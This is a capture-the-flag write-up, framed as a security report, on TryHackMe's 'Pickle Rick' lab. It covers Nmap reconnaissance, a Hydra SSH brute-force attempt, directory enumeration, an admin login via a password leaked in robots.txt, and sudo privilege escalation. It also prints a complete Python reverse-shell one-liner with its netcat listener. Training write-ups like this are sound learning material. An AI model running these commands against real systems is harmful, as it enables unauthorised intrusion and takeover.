# Technical Report

## <mark style="color:purple;">Technical Security Report: "Pickle Rick" System</mark>

### <mark style="color:purple;">Purpose of the Report</mark>

This report documents a simulated security assessment conducted on the "Pickle Rick" system from TryHackMe. The objective was to identify and exploit vulnerabilities, demonstrate potential attack paths, and highlight key areas for security improvement.

***

### <mark style="color:purple;">Methodology</mark>

The assessment was executed using a structured approach:

1. **Reconnaissance:** Identifying open ports and services via Nmap.
2. **Enumeration:** Analyzing web pages and source code to gather user credentials and hidden information.
3. **Exploitation:** Leveraging brute-force techniques, directory enumeration, and command execution to gain further access.
4. **Privilege Escalation:** Establishing a reverse shell and escalating privileges to achieve root access.

***

### <mark style="color:purple;">Detailed Findings</mark>

#### 1. Initial Reconnaissance

* **Tool Used:** Nmap
* **Command Executed:**

  ```bash
  sudo nmap -F -T5 -sCV <target_ip>
  ```
* **Results:** Two open ports were identified:
  * **Port 80:** HTTP service.
  * **Port 22:** SSH service.
* **Impact:** The discovery of these ports set the foundation for further targeted testing.

#### 2. Web Service Analysis

* **Procedure:**
  * Visited `http://<target_ip>:80`, revealing a message from Rick requesting help due to a forgotten password.
  * Examined the page source (via Ctrl+U or using `curl http://<target_ip>`) which exposed the username **R1ckRul3s**.
* **Impact:** The extraction of the username provided a critical credential for subsequent authentication attempts.

#### 3. SSH Brute-Force Attempt

* **Tool Used:** Hydra
* **Command Executed:**

  ```bash
  hydra -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt ssh://<target_ip>
  ```
* **Results:** The SSH service did not support password authentication.
* **Impact:** This method was abandoned in favor of web-based enumeration.

#### 4. Directory Enumeration and Admin Login

* **Tool Used:** Dirbuster
* **Procedure:**
  * Ran Dirbuster to enumerate directories on the HTTP service.
  * Discovered that accessing `/portal.php` redirected to `login.php`, an administrative login page.
* **Authentication Attempts:**
  * Tried common passwords (e.g., Password123, admin, root) with no success.
  * Reviewed the `robots.txt` file, which revealed a potential password.
  * **Result:** The discovered password allowed successful login to the admin panel.
* **Impact:** Gaining access to the admin interface provided an in-browser terminal for command execution.

#### 5. Command Execution and File Discovery

* **Procedure:**
  * Executed commands (`whoami`, `ls -la`) via the admin terminal.
  * Identified a file named `Sup3rS3cretPickl3Ingred.txt`.
  * The `cat` command was blocked; instead, the file was read using:

    ```bash
    base64 "Sup3rS3cretPickl3Ingred.txt" | base64 --decode
    ```
* **Results:** Successfully retrieved the contents (first secret ingredient).
* **Impact:** Obtaining the first ingredient validated the ability to execute system commands.

#### 6. Establishing a Reverse Shell

* **Preparation:**
  * Verified Python 3 availability with `python3 --version`.
  * Employed the reverse shell script from Pentestmonkey.
* **Commands Executed:**
  * **On the Attacker Machine:**

    ```bash
    nc -lnvp 8888
    ```
  * **On the Target (via the admin terminal):**

    ```bash
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<our_ip>",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    ```
* **Result:** An interactive reverse shell was established.
* **Impact:** The reverse shell provided a robust foothold, facilitating deeper system exploration.

#### 7. Privilege Escalation to Root

* **Procedure:**
  * Tested for sudo access; executing:

    ```bash
    sudo /bin/bash
    ```
* **Result:** Obtained root-level access.
* **Impact:** Full system control was achieved, allowing unrestricted enumeration and file access.

#### 8. Final Enumeration and Retrieval of Remaining Ingredients

* **Procedure:**
  * Enumerated the root home directory to locate additional secret ingredients.
  * Read the file `3rd.txt` to retrieve another ingredient.
  * Inspected `/home` to identify the `rick` user's directory, which contained the final secret ingredient.
* **Impact:** All required ingredients were successfully retrieved, completing the challenge.

***

### <mark style="color:purple;">Conclusion</mark>

The assessment of the "Pickle Rick" system showcased a methodical exploitation process—from initial reconnaissance and web-based enumeration to reverse shell establishment and privilege escalation. The successful extraction of all secret ingredients highlights vulnerabilities such as exposed administrative interfaces, weak authentication, and inadequate command restrictions. This exercise underscores the importance of robust service configurations, strong authentication practices, and continuous security monitoring to mitigate potential risks.